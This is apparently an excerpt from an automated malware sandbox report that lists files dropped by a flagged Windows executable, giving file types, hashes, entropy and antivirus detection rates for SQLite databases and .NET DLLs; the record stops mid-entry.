                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:ASCII text, with very long lines (818), with no line terminators
                                          Category:dropped
                                          Size (bytes):818
                                          Entropy (8bit):5.914959416671634
                                          Encrypted:false
                                          SSDEEP:12:/N1AYJ++bGWey8R1eOVlcxiXeIPNXa/ruDek8nPns3/OBxFKEy5h6Rimo+EUkhF+:/8Yvb/8TeELXYuSrP7hahvmcUAAGY
                                          MD5:F46553736E1DC1278196FA025018974B
                                          SHA1:09D502CBBEB6136BF2043D958FD23CA3C3ABF9DA
                                          SHA-256:D2195C3070971A765665602DC97F0B385D7EDAFEBC2B12CB9AFBA0170D417ECC
                                          SHA-512:1C4A027ABA3C4FB904C4BFC1E7E4A8F092B0940596B3E843D64D6FB51DA69EA353CAE4D952BCA99F235A5018D00FF4B1102404D0EEEB771E3E560BD70FD51A13
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                          Category:dropped
                                          Size (bytes):3511394
                                          Entropy (8bit):7.993950820060533
                                          Encrypted:true
                                          SSDEEP:49152:uGmcpg5vS+c8OorsMzNRK6v1hFXefh0iMB+0b+N/uyVbVihyXYuIS:t0vfxoEe6vHFXgh5cb+NhqlS
                                          MD5:3C9CF0B38226E2A7F0191A0130536859
                                          SHA1:87D531257A15E18B50FA341BCE9AC3C5A71BA80D
                                          SHA-256:4AC2DDB4FA2D1917AE491B5AC623E7EBF23E5E34667C63E5ACD433CC6696C23D
                                          SHA-512:AD6BC0C26B6ADBB7EAD5DB17FB4FD4285BCFD623531F41AD6AE31E97A1E760A59F36DE05EAB0E298E0892FEA03D4A4C2AE389D90036C784EDB44E61D7A8161D2
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 68%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview:[ZoneTransfer]....ZoneId=0
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):34304
                                          Entropy (8bit):5.618776214605176
                                          Encrypted:false
                                          SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                          MD5:9B25959D6CD6097C0EF36D2496876249
                                          SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                          SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                          SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 8%
                                          Joe Sandbox View:
                                          • Filename: eRZQCpMb4y.exe, Detection: malicious
                                          • Filename: PCCooker2.0_x64.exe, Detection: malicious
                                          • Filename: kIdT4m0aa4.exe, Detection: malicious
                                          • Filename: 5R28W1PAnS.exe, Detection: malicious
                                          • Filename: iqA8j9yGcd.exe, Detection: malicious
                                          • Filename: TwfUz3FuO7.exe, Detection: malicious
                                          • Filename: z3yAH0LL5e.exe, Detection: malicious
                                          • Filename: Componentsession.exe, Detection: malicious
                                          • Filename: -#U00bc).exe, Detection: malicious
                                          • Filename: Loader.exe, Detection: malicious
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):34304
                                          Entropy (8bit):5.618776214605176
                                          Encrypted:false
                                          SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                          MD5:9B25959D6CD6097C0EF36D2496876249
                                          SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                          SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                          SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 8%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):39936
                                          Entropy (8bit):5.660491370279985
                                          Encrypted:false
                                          SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                          MD5:240E98D38E0B679F055470167D247022
                                          SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                          SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                          SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 8%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):41472
                                          Entropy (8bit):5.6808219961645605
                                          Encrypted:false
                                          SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                          MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                          SHA1:094DE32070BED60A811D983740509054AD017CE4
                                          SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                          SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 8%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):85504
                                          Entropy (8bit):5.8769270258874755
                                          Encrypted:false
                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 71%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):32256
                                          Entropy (8bit):5.631194486392901
                                          Encrypted:false
                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 29%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):24576
                                          Entropy (8bit):5.535426842040921
                                          Encrypted:false
                                          SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                          MD5:5420053AF2D273C456FB46C2CDD68F64
                                          SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                          SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                          SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):46592
                                          Entropy (8bit):5.870612048031897
                                          Encrypted:false
                                          SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                          MD5:3601048DFB8C4A69313A593E74E5A2DE
                                          SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                          SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                          SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 5%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):85504
                                          Entropy (8bit):5.8769270258874755
                                          Encrypted:false
                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 71%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):36352
                                          Entropy (8bit):5.668291349855899
                                          Encrypted:false
                                          SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                          MD5:94DA5073CCC14DCF4766DF6781485937
                                          SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                          SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                          SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 21%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):50176
                                          Entropy (8bit):5.723168999026349
                                          Encrypted:false
                                          SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                          MD5:2E116FC64103D0F0CF47890FD571561E
                                          SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                          SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                          SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 21%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):41472
                                          Entropy (8bit):5.6808219961645605
                                          Encrypted:false
                                          SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                          MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                          SHA1:094DE32070BED60A811D983740509054AD017CE4
                                          SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                          SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 8%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):24064
                                          Entropy (8bit):5.4346552043530165
                                          Encrypted:false
                                          SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                          MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                          SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                          SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                          SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 6%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):38400
                                          Entropy (8bit):5.699005826018714
                                          Encrypted:false
                                          SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                          MD5:87765D141228784AE91334BAE25AD743
                                          SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                          SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                          SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 9%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):38400
                                          Entropy (8bit):5.699005826018714
                                          Encrypted:false
                                          SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                          MD5:87765D141228784AE91334BAE25AD743
                                          SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                          SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                          SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 9%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):33280
                                          Entropy (8bit):5.634433516692816
                                          Encrypted:false
                                          SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                          MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                          SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                          SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                          SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 12%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):32256
                                          Entropy (8bit):5.631194486392901
                                          Encrypted:false
                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 29%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):28160
                                          Entropy (8bit):5.570953308352568
                                          Encrypted:false
                                          SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                          MD5:A4F19ADB89F8D88DBDF103878CF31608
                                          SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                          SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                          SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 4%
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):33280
                                          Entropy (8bit):5.634433516692816
                                          Encrypted:false
                                          SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                          MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                          SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                          SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                          SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 12%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):294912
                                          Entropy (8bit):6.010605469502259
                                          Encrypted:false
                                          SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                          MD5:00574FB20124EAFD40DC945EC86CA59C
                                          SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                          SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                          SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):24064
                                          Entropy (8bit):5.4346552043530165
                                          Encrypted:false
                                          SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                          MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                          SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                          SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                          SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 6%
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):70144
                                          Entropy (8bit):5.909536568846014
                                          Encrypted:false
                                          SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                          MD5:E4FA63649F1DBD23DE91861BB39C317D
